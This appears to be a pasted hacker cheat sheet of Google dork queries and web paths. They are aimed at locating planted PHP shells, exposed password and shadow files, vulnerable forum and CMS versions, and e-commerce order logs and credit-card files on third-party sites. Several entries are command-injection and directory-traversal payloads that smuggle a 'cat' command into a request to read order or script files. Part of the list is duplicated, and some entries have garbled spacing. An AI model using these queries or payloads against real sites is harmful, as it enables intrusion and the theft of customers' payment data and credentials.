Guest User

Untitled

a guest
Jan 24th, 2016
439
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 39.02 KB | None | 0 0
  1. ________________________ [+] ________________________
  2.  
  3. For Dorks ::
  4. -hack -exploit -dork -honeypot -honeypage -googlehacking
  5.  
  6. For Shells ::
  7. +rwx -honeypot -honeypage -"honey page" -googlehacking -dork -treat -topic
  8.  
  9.  
  10. ________________________ Search for Shell ________________________
  11.  
  12. r57 #full
  13. intitle:r57shell +uname +rwx -honeypot -honeypage -"honey page" -googlehacking -dork -treat -topic
  14.  
  15. r57
  16. intitle:r57shell +uname -bbpress
  17.  
  18. MyShell
  19. intitle:MyShell 1.1.0 build 20010923
  20.  
  21. PHP Shell
  22. intitle:"PHP Shell *" "Enable stderr" filetypehp
  23.  
  24. MyShell
  25. intitle:MyShell 1.1.0 build 20010923
  26.  
  27. PHPKonsole PHPShell
  28. PHPKonsole PHPShell filetypehp -echo
  29.  
  30. c99
  31. inurl:c99.php
  32. inurl:c99.php uid=0(root)
  33. powered by Captain Crunch Security Team
  34. C99Shell v. 1.0 pre-release build #16 download
  35.  
  36. ________________________ 0TH3R ________________________
  37.  
  38. "Index of /admin"
  39. "Index of /password"
  40. "Index of /mail"
  41. "Index of /" +passwd
  42. "Index of /" +password.txt
  43. "Index of /" +.htaccess
  44. index of ftp +.mdb allinurl:/cgi-bin/ +mailto
  45.  
  46. administrators.pwd.index
  47. authors.pwd.index
  48. service.pwd.index
  49. filetype:config web
  50. gobal.asax index
  51.  
  52.  
  53. inurl:passwd filetype:txt
  54. inurl:admin filetype:db
  55. inurl:iisadmin
  56. inurl:"auth_user_file.txt"
  57. inurl:"wwwroot/*."
  58.  
  59. top secret site:mil
  60. confidential site:mil
  61.  
  62. allinurl: winnt/system32/ (get cmd.exe)
  63. allinurl:/bash_history
  64.  
  65. intitle:"Index of" .sh_history
  66. intitle:"Index of" .bash_history
  67. intitle:"index of" passwd
  68. intitle:"index of" people.lst
  69. intitle:"index of" pwd.db
  70. intitle:"index of" etc/shadow
  71. intitle:"index of" spwd
  72. intitle:"index of" master.passwd
  73. intitle:"index of" htpasswd
  74. intitle:"index of" members OR accounts
  75. intitle:"index of" user_carts OR user_cart
  76.  
  77.  
  78.  
  79.  
  80. ________________________ ALTERNATIVE INPUTS ________________________
  81. _vti_inf.html
  82. service.pwd
  83. users.pwd
  84. authors.pwd
  85. administrators.pwd
  86. shtml.dll
  87. shtml.exe
  88. fpcount.exe
  89. def ault.asp
  90. showcode.asp
  91. sendmail.cfm
  92. getFile.cfm
  93. imagemap.exe
  94. test.bat
  95. msadcs.dll
  96. htimage.exe
  97. counter.exe
  98. browser.inc
  99. hello.bat
  100. def ault.aspdvwssr.dll
  101. cart32.exe
  102. add.exe
  103. index.jsp
  104. *******Servlet
  105. shtml.dll
  106. index.cfm
  107. page.cfm
  108. shtml.exe
  109. web_store.cgi
  110. shop.cgi
  111. uplo ad.asp
  112. default.asp
  113. pbserver.dll
  114. phf
  115. test-cgi
  116. finger
  117. Count.cgi
  118. jj
  119. php.cgi
  120. php
  121. nph-test-cgi
  122. handler
  123. webdist.cgi
  124. webgais
  125. websendm ail
  126. faxsurvey
  127. htmlscript
  128. perl.exe
  129. wwwboard.pl
  130. www-sql
  131. view-source
  132. campas
  133. aglimpse
  134. glimpse
  135. man.sh
  136. AT-admin.cgi
  137. AT-generate.cgi
  138. f ilemail.pl
  139. maillist.pl
  140. info2www
  141. files.pl
  142. bnbform.cgi
  143. survey.cgi
  144. classifieds.cgi
  145. wrap
  146. cgiwrap
  147. edit.pl
  148. perl
  149. names.nsf
  150. webgais
  151. dum penv.pl
  152. test.cgi
  153. submit.cgi
  154. guestbook.cgi
  155. guestbook.pl
  156. cachemgr.cgi
  157. responder.cgi
  158. perlshop.cgi
  159. query
  160. w3-msql
  161. plusmail
  162. htsearch
  163. i nfosrch.cgi
  164. publisher
  165. ultraboard.cgi
  166. db.cgi
  167. formmail.cgi
  168. allmanage.pl
  169. ssi
  170. adpassword.txt
  171. redirect.cgi
  172. cvsweb.cgi
  173. login.jsp
  174. dbconn ect.inc
  175. admin
  176. htgrep
  177. wais.pl
  178. amadmin.pl
  179. subscribe.pl
  180. news.cgi
  181. auctionweaver.pl
  182. .htpasswd
  183. acid_main.php
  184. access.log
  185. log.htm
  186. log.ht ml
  187. log.txt
  188. logfile
  189. logfile.htm
  190. logfile.html
  191. logfile.txt
  192. logger.html
  193. stat.htm
  194. stats.htm
  195. stats.html
  196. stats.txt
  197. webaccess.htm
  198. wwwsta ts.html
  199. source.asp
  200. perl
  201. mailto.cgi
  202. YaBB.pl
  203. mailform.pl
  204. cached_feed.cgi
  205. global.cgi
  206. Search.pl
  207. build.cgi
  208. common.php
  209. show
  210. global.inc
  211. ad.cgi
  212. WSFTP.LOG
  213. index.html~
  214. index.php~
  215. index.html.bak
  216. index.php.bak
  217. print.cgi
  218. register.cgi
  219. webdriver
  220. bbs_forum.cgi
  221. mysql.class
  222. s endmail.inc
  223. CrazyWWWBoard.cgi
  224. search.pl
  225. way-board.cgi
  226. webpage.cgi
  227. pwd.dat
  228. adcycle
  229. post-query
  230. help.cgi
  231.  
  232.  
  233. robots.txt
  234. /admin.mdb
  235. /shopping.mdb
  236. /arg;
  237. /stats/styles.css
  238. /statshelp.htm
  239. /favicon.ico
  240. /stats/admin.mdb
  241. /shopdbtest.asp
  242. /cgi-bin/test.cgi
  243. /cgi-bin/test.pl
  244. /cgi-bin/env.cgi
  245. /photos/protest/styles.css
  246. /cgi-bin/whereami.cgi
  247. /shopping400.mdb
  248. /cgi/test.cgi
  249. /cgi-bin/test2.pl
  250. /photos/protest/kingmarch_02.html
  251. /chevy/index.htm
  252. /cgi-bin/glocation.cgi
  253. /cgi-bin/test2.cgi
  254. /ccbill/glocation.cgi
  255. /cgi-bin/styles.css
  256. /shopping350.mdb
  257. /cgi-bin/shopper.cgi
  258. /shopadmin.asp
  259. /news_2003-02-27.htm
  260. /cgi-bin/whois.cgi
  261. 3 /cgi-bin/calendar.pl
  262. 3 /cgi-bin/calendar/calendar.pl
  263. 3 /cgibin/styles.css
  264. 3 /venem.htm
  265. 2 /stats/www.newbauersflowers.com/stats/04-refers.htm
  266. 2 /cgi-bin/where.pl
  267. 2 /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG
  268. 2 /cgibin/recon.cgi
  269. 2 /cgibin/test.cgi
  270. 2 /WebShop/templates/styles.css
  271. 2 /stats/shopping350.mdb
  272. 2 /cgi-bin/mailform.cgi
  273. 2 /cgi-bin/recon.cgi
  274. 2 /chevy
  275. 2 /cgi-bin/servinfo.cgi
  276. 2 /acart2_0.mdb
  277. 2 /cgi-bin/where.cgi
  278. 2 /chevy/
  279. 2 /stats/www.savethemall.net/stats/19-refers.htm
  280. 2 /ccbill/secure/ccbill.log
  281. 2 /cgi/recon.cgi
  282. 2 /stats/www.gregoryflynn.com/chevy
  283. 2 /ibill/glocation.cgi
  284. 2 /ccbill/whereami.cgi
  285. 2 /ibill/whereami.cgi
  286. 2 /apps_trial.htm
  287. 2 /cgi-bin/lancelot/recon.cgi
  288. 2 /cgi-bin/DCShop/Orders/styles.css
  289. 1 /cgi-bin/htmanage.cgi
  290. 1 /stats/www.tysons.net/stats/05-refers.htm
  291. 1 /cgi-bin/mastergate/add.cgi
  292. 1 /cgi-bin/openjournal.cgi
  293. 1 /cgi-bin/calendar/calendar_admin.pl
  294. 1 /cgibin/ibill/count.cgi
  295. 1 /cgi-bin/nbmember2.cgi
  296. 1 /cgi-bin/mastergate/count.cgi
  297. 1 /cgi-bin/mastergate/accountcreate.cgi
  298. 1 /cgi-bin/ibill/accountcreate.cgi
  299. 1 /cgibin/MasterGate2/count.cgi
  300. 1 /cgi-bin/amadmin.pl
  301. 1 /cgibin/mailform.cgi
  302. 1 /cgibin/mastergate/count.cgi
  303. 1 /cgibin/harvestor.cgi
  304. 1 /cgibin/igate/count.cgi
  305. 1 /WebShop
  306. 1 /shopdisplaycategories.asp
  307. 1 /cgi-bin/DCShop/Orders/orders.txt
  308. 1 /cgi-bill/revshare/joinpage.cgi
  309. 1 /stats/www.gregoryflynn.com/stats/19-refers.htm
  310. 1 /cgi-local/DCShop/auth_data/styles.css
  311. 1 /cgi-bin/add-passwd.cgi
  312. 1 /cgi-bin/MasterGate/count.cgi
  313. 1 /apps_shop.htm%20/comersus/database/comersus.mdb
  314. 1 /data/verotellog.txt
  315. 1 /epwd/ws_ftp.log
  316. 1 /stats/www.dialacure.com/stats/16-refers.htm
  317. 1 /cgi/MasterGate2/count.cgi
  318. 1 /jump/rsn.tmus/skybox;sz=140x150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019
  319. 1 /wwii/styles.css
  320. 1 /cgi-bin/admin.mdb
  321. 1 /stats/www.gregoryflynn.com/stats/31-refers.htm
  322. 1 /cgi-bin/ibill-tools/count.cgi
  323. 1 /WebShop/templates/cc.txt
  324. 1 /cgibin/ibill/accountcreate.cgi
  325. 1 /cgi-bin/count.cgi
  326. 1 /cgi-local/DCShop/auth_data/auth_user_file.txt
  327. 1 /cgi/mastergate/count.cgi
  328. 1 /cgi-bin/EuroDebit/addusr.pl
  329. 1 /cgi-bin/dbm-passwd.cgi
  330. 1 /cgi/igate/accountcreate.cgi
  331.  
  332.  
  333. 3 /cgi-bin/calendar.pl
  334. 3 /cgi-bin/calendar/calendar.pl
  335. 3 /cgibin/styles.css
  336. 3 /venem.htm
  337. 2 /stats/www.newbauersflowers.com/stats/04-refers.htm
  338. 2 /cgi-bin/where.pl
  339. 2 /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG
  340. 2 /cgibin/recon.cgi
  341. 2 /cgibin/test.cgi
  342. 2 /WebShop/templates/styles.css
  343. 2 /stats/shopping350.mdb
  344. 2 /cgi-bin/mailform.cgi
  345. 2 /cgi-bin/recon.cgi
  346. 2 /chevy
  347. 2 /cgi-bin/servinfo.cgi
  348. 2 /acart2_0.mdb
  349. 2 /cgi-bin/where.cgi
  350. 2 /chevy/
  351. 2 /stats/www.savethemall.net/stats/19-refers.htm
  352. 2 /ccbill/secure/ccbill.log
  353. 2 /cgi/recon.cgi
  354. 2 /stats/www.gregoryflynn.com/chevy
  355. 2 /ibill/glocation.cgi
  356. 2 /ccbill/whereami.cgi
  357. 2 /ibill/whereami.cgi
  358. 2 /apps_trial.htm
  359. 2 /cgi-bin/lancelot/recon.cgi
  360. 2 /cgi-bin/DCShop/Orders/styles.css
  361. 1 /cgi-bin/htmanage.cgi
  362. 1 /stats/www.tysons.net/stats/05-refers.htm
  363. 1 /cgi-bin/mastergate/add.cgi
  364. 1 /cgi-bin/openjournal.cgi
  365. 1 /cgi-bin/calendar/calendar_admin.pl
  366. 1 /cgibin/ibill/count.cgi
  367. 1 /cgi-bin/nbmember2.cgi
  368. 1 /cgi-bin/mastergate/count.cgi
  369. 1 /cgi-bin/mastergate/accountcreate.cgi
  370. 1 /cgi-bin/ibill/accountcreate.cgi
  371. 1 /cgibin/MasterGate2/count.cgi
  372. 1 /cgi-bin/amadmin.pl
  373. 1 /cgibin/mailform.cgi
  374. 1 /cgibin/mastergate/count.cgi
  375. 1 /cgibin/harvestor.cgi
  376. 1 /cgibin/igate/count.cgi
  377. 1 /WebShop
  378. 1 /shopdisplaycategories.asp
  379. 1 /cgi-bin/DCShop/Orders/orders.txt
  380. 1 /cgi-bill/revshare/joinpage.cgi
  381. 1 /stats/www.gregoryflynn.com/stats/19-refers.htm
  382. 1 /cgi-local/DCShop/auth_data/styles.css
  383. 1 /cgi-bin/add-passwd.cgi
  384. 1 /cgi-bin/MasterGate/count.cgi
  385. 1 /apps_shop.htm%20/comersus/database/comersus.mdb
  386. 1 /data/verotellog.txt
  387. 1 /epwd/ws_ftp.log
  388. 1 /stats/www.dialacure.com/stats/16-refers.htm
  389. 1 /cgi/MasterGate2/count.cgi
  390. 1 /jump/rsn.tmus/skybox;sz=140x150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019
  391. 1 /wwii/styles.css
  392. 1 /cgi-bin/admin.mdb
  393. 1 /stats/www.gregoryflynn.com/stats/31-refers.htm
  394. 1 /cgi-bin/ibill-tools/count.cgi
  395. 1 /WebShop/templates/cc.txt
  396. 1 /cgibin/ibill/accountcreate.cgi
  397. 1 /cgi-bin/count.cgi
  398.  
  399.  
  400. 1 /cgi-local/DCShop/auth_data/auth_user_file.txt
  401. 1 /cgi/mastergate/count.cgi
  402. 1 /cgi-bin/EuroDebit/addusr.pl
  403. 1 /cgi-bin/dbm-passwd.cgi
  404. 1 /cgi/igate/accountcreate.cgi
  405. 1 /cgi-bin/store/Log_files/your_order.log
  406. store/log_files/your_order.log
  407. /cgi-bin/DCShop/Orders/orders.txt
  408. /vpasp/shopdbtest.asp
  409. /orders/checks.txt
  410. /WebShop/logs
  411. /ccbill/secure/ccbill.log
  412. /scripts/cart32.exe
  413. /cvv2.txt
  414. /cart/shopdbtest.asp
  415. /cgi-win/cart.pl
  416. /shopdbtest.asp
  417. /WebShop/logs/cc.txt
  418. /cgi-local/cart.pl
  419. /PDG_Cart/order.log
  420. /config/datasources/expire.mdb
  421. /cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
  422. /orders/orders.txt
  423. /cgis/cart.pl
  424. /webcart/carts
  425. /cgi-bin/cart32.exe/cart32clientlist
  426. /cgi/cart.pl
  427. /comersus/database/comersus.mdb
  428. /WebShop/templates/cc.txt
  429. /Admin_files/order.log
  430. /orders/mountain.cfg
  431. /cgi-sys/cart.pl
  432. /scripts/cart.pl
  433. /htbin/cart.pl
  434. /productcart/database/EIPC.mdb
  435. /shoponline/fpdb/shop.mdb
  436. /config/datasources/myorder.mdb
  437. /PDG_Cart/shopper.conf
  438. /shopping/database/metacart.mdb
  439. /bin/cart.pl
  440. /cgi-bin/cart32.ini
  441. /database/comersus.mdb
  442. /cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
  443. /cgi-bin/store/Admin_files/myorderlog.txt
  444. /cgi-bin/orders.txt
  445. /cgi-bin/store/Admin_files/your_order.log
  446. /test/test.txt
  447. /fpdb/shop.mdb
  448. /cgibin/shop/orders/orders.txt
  449. /shopadmin1.asp
  450. /cgi-bin/shop.cgi
  451. /cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
  452. /cgi-bin/PDG_cart/card.txt
  453. /shopper.cgi?preadd=action&key=PROFA&template=order 1.log
  454. /store/shopdbtest.asp
  455. /log_files/your_order.log
  456. /_database/expire.mdb
  457. /HyperStat/stat_what.log
  458. /cgibin/DCShop/auth_data/auth_user_file.txt
  459. /htbin/orders/orders.txt
  460. /SHOP/shopadmin.asp
  461. /index.cgi?page=../admin/files/order.log
  462. /vpshop/shopadmin.asp
  463. /webcart/config
  464. /PDG/order.txt
  465. /cgi-bin/shopper.cgi
  466. /orders/order.log
  467. /orders/db/zzzbizorders.log.html
  468. /easylog/easylog.html
  469. /cgi-bin/store/Log_files/your_order.log
  470. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=sh opping400.mdb
  471. /comersus_message.asp?
  472. /orders/import.txt
  473. /htbin/DCShop/auth_data/auth_user_file.txt
  474. /admin/html_lib.pl
  475. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=my order.txt
  476. /cgi-bin/DCShop/auth_data/auth_user_file.txt
  477.  
  478.  
  479. /cgi-bin/shop.pl/page=;cat%20shop.pl
  480. /cgi-bin/shopper?search=action&keywords=dhenzuser%20&templa te=order.log
  481. /HBill/htpasswd
  482. /bin/shop/auth_data/auth_user_file.txt
  483. /cgi-bin/cs/shopdbtest.asp
  484. /mysql/shopping.mdb
  485. /Catalog/config/datasources/Products.mdb
  486. /trafficlog
  487. /cgi/orders/orders.txt
  488. /cgi-local/PDG_Cart/shopper.conf
  489. /store/cgi-bin/Admin_files/expire.mdb
  490. /derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
  491. /derbyteccgi/shopper.cgi?search=action&keywords=moron&template= order.log
  492. /cgi-bin/mc.txt
  493. /cgi-bin/mall2000.cgi
  494. /cgi-win/DCShop/auth_data/auth_user_file.txt
  495. /cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
  496. /store/commerce.cgi
  497. /scripts/shop/orders/orders.txt
  498. /product/shopping350.mdb
  499. /super_stats/access_logs
  500. /cgi-local/orders/orders.txt
  501. /cgi-bin/PDG_Cart/mc.txt
  502. /cgibin/cart32.exe
  503. /cgi-bin/Shopper.exe?search=action&keywords=psiber%20&templ ate=other/risinglogorder.log
  504. /cgibin/password.txt
  505. /Catalog/cart/carttrial.dat
  506. /catalog/Admin/Admin.asp
  507. /ecommerce/admin/user/admin.asp
  508. /data/productcart/database/EIPC.mdb
  509. /store/admin_files/commerce_user_lib.pl
  510. /cgi-bin/store/index.cgi
  511. /paynet.txt
  512. /config/datasources/store/billing.mdb
  513. /_database/shopping350.mdb
  514. /cgi-bin/shopper.exe?search
  515. /cgi/shop.pl/page=;cat%20shop.pl
  516. /cgi-bin/store/Admin_files/orders.txt
  517. /cgi-bin/store/commerce_user_lib.pl
  518. /cgi-sys/pagelog.cgi
  519. /cgi-sys/shop.pl/page=;cat%20shop.pl
  520. /scripts/weblog
  521. /fpdb/shopping400.mdb
  522. /htbin/shop/orders/orders.txt
  523. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=my order.log
  524. /cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
  525. /mall_log_files/
  526. /cgi-bin/perlshop.cgi
  527. /tienda/shopdbtest.asp
  528. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=sh opping.mdb
  529. /cgi-bin/shopper.cgi?search=action&keywords=whinhall&templa te=order.log
  530. /WebShop/logs/ck.log
  531. /fpdb/shopping300.mdb
  532. /mysql/store.mdb
  533. /cgi-bin/store/Admin_files/commerce_user_lib.pl
  534. /config.dat
  535. /order/order.log
  536. /commerce_user_lib.pl
  537. /Admin_files/AuthorizeNet_user_lib.pl
  538. /cvv2.asp
  539. /cgi-bin/cart32/CART32-order.txt
  540. /wwwlog
  541. /cool-logs/mlog.html
  542. /cgi-bin/pass/merchant.cgi.log
  543. /cgi-local/pagelog.cgi
  544. /cgi-bin/pagelog.cgi
  545. /cgi-bin/orders/cc.txt
  546. /cgis/shop/orders/orders.txt
  547. /admin/admin_conf.pl
  548. /cgi-bin/pdg_cart/order.log
  549. /cgi/PDG_Cart/order.log
  550. /Admin_files/ccelog.txt
  551. /cgi-bin/orders/mc.txt
  552. /cgi/cart32.exe
  553. /ecommerce/admin/admin.asp
  554. /scripts/DCShop/auth_data/auth_user_file.txt
  555. /Catalog/config/datasources/Expire.mdb
  556. /ecommerce/admin/shopdbtest.asp
  557. /mysql/mystore.mdb
  558. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=sh opping.asp
  559. /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
  560. /cgi-bin/Count.cgi?df=callcard.dat
  561. /logfiles/
  562. /shopping/shopping350.mdb
  563. /admin/configuration.pl
  564. /cgis/DCShop/auth_data/auth_user_file.txt
  565. /cgis/cart32.exe
  566. /cgi-bin/dcshop.cgi
  567. /cgi-win/shop/auth_data/auth_user_file.txt
  568. /shopping400.mdb
  569. /HBill/config
  570. /cgi-bin/shop/index.cgi?page=../admin/files/order.log
  571. /search=action&keywords=GSD%20&template=order.log
  572. /WebCart/orders.txt
  573. /PDG_Cart/authorizenets.txt
  574. /cgi-bin/AnyForm2
  575. /~gcw/cgi-bin/Count.cgi?df=callcard.dat
  576.  
  577.  
  578. /cgi-bin/PDG_Cart/order.log
  579. /expire.mdb
  580. /logger/
  581. /webcart-lite/orders/import.txt
  582. /cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
  583. /cgi-bin/PDG_Cart/shopper.conf
  584. /cgi-bin/cart32.exe
  585. /dc/orders/orders.txt
  586. /cgi-local/DCShop/orders/orders.txt
  587. /shop.pl/page=shop.cfg
  588. /cgi-local/cart32.exe
  589. /cgi-win/pagelog.cgi
  590. /cgi-win/shop/orders/orders.txt
  591. /cgibin/shopper.cgi?search=action&keywords=moron&template= order.csv
  592. /cgi-sys/DCShop/auth_data/auth_user_file.txt
  593. /cgi-bin/www-sql;;;
  594. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=or der.log
  595. /scripts/orders/orders.txt
  596. /cgi-local/shop.pl/shop.cfg
  597. /search=action&keywords=cwtb%20&template=expire.mdb
  598. /php/mylog.phtml
  599. /config/datasources/shopping.mdb
  600. /php-coolfile/action.php?action=edit&file=config.php
  601. /cgi-bin/ezmall2000/mall2000.cgi
  602. /cgi/DCShop/orders/orders.txt
  603. /cgi-local/shop.pl
  604. /cgis/DCShop/orders/orders.txt
  605. /product/shopdbtest.asp
  606. /ASP/cart/database/metacart.mdb
  607. /cgi-bin/cgi-lib.pl
  608. /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
  609. /search=action&keywords=cwtb%20&template=order.log
  610. /mysql/expire.mdb
  611. /scripts/shop/auth_data/auth_user_file.txt
  612. /cgi-bin/cart32/whatever-OUTPUT.txt
  613. /Shopping%20Cart/shopdbtest.asp
  614. /cgi/shop/auth_data/auth_user_file.txt
  615. /shop/shopping350.mdb
  616. /cgi-bin/store/Authorize_Net.pl
  617. /scripts/DCShop/orders/orders.txt
  618. /store/log_files/commerce_user_lib.pl
  619. /shopping/shopadmin.asp
  620. /cgi-bin/orderlog.txt
  621. /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;c at%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
  622. /cool-logs/mylog.html
  623. /cgibin/shop.pl/page=;cat%20shop.pl
  624. /htbin/shop.pl/page=;cat%20shop.pl
  625. /cgi-win/orders/orders.txt
  626. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=or der1.txt
  627. /SHOP/shopdbtest.asp
  628. /cgi/pagelog.cgi
  629. /php/mlog.phtml
  630. /cgi-bin/shop/apdproducts.mdb
  631. /htbin/shop/auth_data/auth_user_file.txt
  632. /server%20logfile;;;
  633. /database/metacart.mdb
  634. /cgi-local/shop/orders/orders.txt
  635.  
  636. POWERED BY - WWW.HACKERSCAFE.IN
  637. " 1999-2004 FuseTalk Inc" -site:fusetalk.com
  638. "2003 DUware All Rights Reserved"
  639. "2004-2005 ReloadCMS Team."
  640. "2005 SugarCRM Inc. All Rights Reserved" "Powered By SugarCRM"
  641. "Active Webcam Page" inurl:8080
  642. "Based on DoceboLMS 2.0"
  643. "BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen"
  644. "BosDates Calendar System " "powered by BosDates v3.2 by BosDev"
  645. "Calendar programming by AppIdeas.com" filetype:php
  646. "Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved" "Mambo is Free Software
  647. released"
  648. "Copyright 2004 © Digital Scribe v.1.4"
  649. "Copyright © 2002 Agustin Dondo Scripts"
  650. "CosmoShop by Zaunz Publishing" inurl:"cgi-bin/cosmoshop/lshop.cgi"
  651. -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*
  652. "Cyphor (Release:" -www.cynox.ch
  653. "delete entries" inurl:admin/delete.asp
  654. "driven by: ASP Message Board"
  655. "Enter ip" inurl:"php-ping.php"
  656. "IceWarp Web Mail 5.3.0" "Powered by IceWarp"
  657. "Ideal BB Version: 0.1" -idealbb.com
  658. "index of" intext:fckeditor inurl:fckeditor
  659. "inurl:/site/articles.asp?idcategory="
  660. "Maintained with Subscribe Me 2.044.09p"+"Professional" inurl:"s.pl"
  661. "Mimicboard2 086"+"2000 Nobutaka Makino"+"password"+"message" inurl:page=1
  662. "News generated by Utopia News Pro" | "Powered By: Utopia News Pro"
  663. "Obtenez votre forum Aztek" -site:forum-aztek.com
  664. "Online Store - Powered by ProductCart"
  665. "PhpCollab . Log In" | "NetOffice . Log In" | (intitle:"index.of." intitle:phpcollab|netoffice
  666. inurl:phpcollab|netoffice -gentoo)
  667. "portailphp v1.3" inurl:"index.php?affiche" inurl:"PortailPHP" -site:safari-msi.com
  668. "running: Nucleus v3.1" -.nucleuscms.org -demo
  669. "Software PBLang" 4.65 filetype:php
  670. "SquirrelMail version 1.4.4" inurl:src ext:php
  671. "Thank You for using WPCeasy"
  672. "This page has been automatically generated by Plesk Server Administrator"
  673. "This script was created by Php-ZeroNet" "Script . Php-ZeroNet"
  674. "This website engine code is copyright" "2005 by Clever Copy" -inurl:demo
  675. "This website powered by PHPX" -demo
  676. "This website was created with phpWebThings 1.4"
  677. "Welcome to the versatileBulletinBoard" | "Powered by versatileBulletinBoard"
  678. "You have not provided a survey identification number" ERROR -xoops.org "please contact"
  679. ("powered by nocc" intitle:"NOCC Webmail") -site:sourceforge.net -Zoekinalles.nl -analysis
  680. ("Skin Design by Amie of Intense")|("Fanfiction Categories" "Featured Stories")|("default2, 3column,
  681. Romance, eFiction")
  682. ("This Dragonfly™ installation was" | "Thanks for downloading Dragonfly") -inurl:demo -inurl:cpgnuke.com
  683. (intitle:"Flyspray setup"|"powered by flyspray 0.9.7") -flyspray.rocks.cc
  684. (intitle:"metaframe XP Login")|(intitle:"metaframe Presentation server Login")
  685. +"Powered by Invision Power Board v2.0.0..2"
  686. +"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl
  687. +intext:"powered by MyBulletinBoard"
  688. Achievo webbased project management
  689. allintitle:aspjar.com guestbook
  690. E-market remote code execution
  691. EarlyImpact Productcart
  692. ext:php intext:"Powered by phpNewMan Version"
  693. ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input
  694. filetype:cgi inurl:nbmember.cgi
  695. filetype:cgi inurl:pdesk.cgi
  696. filetype:cgi inurl:tseekdir.cgi
  697. filetype:php intitle:"paNews v2.0b4"
  698. filetype:php inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)
  699. intext:"2000-2001 The phpHeaven Team" -sourceforge
  700. intext:"2000-2001 The phpHeaven Team" -sourceforge
  701. intext:"Calendar Program © Copyright 1999 Matt Kruse" "Add an event"
  702. intext:"LinPHA Version" intext:"Have fun"
  703. intext:"PhpGedView Version" intext:"final - index" -inurl:demo
  704. intext:("UBB.threads™ 6.2"|"UBB.threads™ 6.3") intext:"You * not logged *" -site:ubbcentral.com
  705. intitle:"4images - Image Gallery Management System" and intext:"Powered by 4images 1.7.1"
  706. intitle:"b2evo installer" intext:"Installer fur Version"
  707. intitle:"blog torrent upload"
  708. intitle:"EMUMAIL - Login" "Powered by EMU Webmail"
  709. intitle:"HelpDesk" "If you need additional help, please email helpdesk at"
  710. intitle:"igenus webmail login"
  711. intitle:"Looking Glass v20040427" "When verifying an URL check one of those"
  712. intitle:"MRTG/RRD" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)
  713. intitle:"myBloggie 2.1.1..2 - by myWebland"
  714. intitle:"osTicket :: Support Ticket System"
  715. intitle:"PHP TopSites FREE Remote Admin"
  716. intitle:"phpDocumentor web interface"
  717. intitle:"PowerDownload" ("PowerDownload v3.0.2 ©" | "PowerDownload v3.0.3 ©" )
  718. -site:powerscripts.org
  719. intitle:"View Img" inurl:viewimg.php
  720. intitle:"WebJeff - FileManager" intext:"login" intext:Pass|PAsse
  721. intitle:"WordPress > * > Login form" inurl:"wp-login.php"
  722. intitle:admbook intitle:version filetype:php
  723.  
  724.  
  725. intitle:guestbook "advanced guestbook 2.2 powered"
  726. intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"
  727. intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"
  728. intitle:Mantis "Welcome to the bugtracker" "0.15 | 0.16 | 0.17 | 0.18"
  729. intitle:PHPOpenChat inurl:"index.php?language="
  730. intitle:welcome.to.horde
  731. inurl:"/cgi-bin/loadpage.cgi?user_id="
  732. inurl:"/login.asp?folder=" "Powered by: i-Gallery 3.3"
  733. inurl:"/site/articles.asp?idcategory="
  734. inurl:"comment.php?serendipity"
  735. inurl:"extras/update.php" intext:mysql.php -display
  736. inurl:"forumdisplay.php" +"Powered by: vBulletin Version 3.0.0..4"
  737. inurl:"messageboard/Forum.asp?"
  738. inurl:"slxweb.dll"
  739. inurl:"wfdownloads/viewcat.php?list="
  740. inurl:*.exe ext:exe inurl:/*cgi*/
  741. inurl:/SiteChassisManager/
  742. inurl:cal_make.pl
  743. inurl:chitchat.php "choose graphic"
  744. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
  745. inurl:comersus_message.asp
  746. inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php
  747. inurl:database.php | inurl:info_db.php ext:php "Database V2.*" "Burning Board *"
  748. inurl:directorypro.cgi
  749. inurl:docmgr | intitle:"DocMGR" "enter your Username and"|"und Passwort bitte"|"saisir votre nom"|"su
  750. nombre de usuario" -ext:pdf -inurl:"download.php
  751. inurl:gotoURL.asp?url=
  752. inurl:install.pl intitle:GTchat
  753. inurl:perldiver.cgi ext:cgi
  754. inurl:resetcore.php ext:php
  755. inurl:server.php ext:php intext:"No SQL" -Released
  756. inurl:sphpblog intext:"Powered by Simple PHP Blog 0.4.0"
  757. inurl:sysinfo.cgi ext:cgi
  758. inurl:technote inurl:main.cgi*filename=*
  759. inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk
  760. inurl:ttt-webmaster.php
  761. inurl:wiki/MediaWiki
  762. Invision Power Board SSI.PHP SQL Injection
  763. mnGoSearch vulnerability
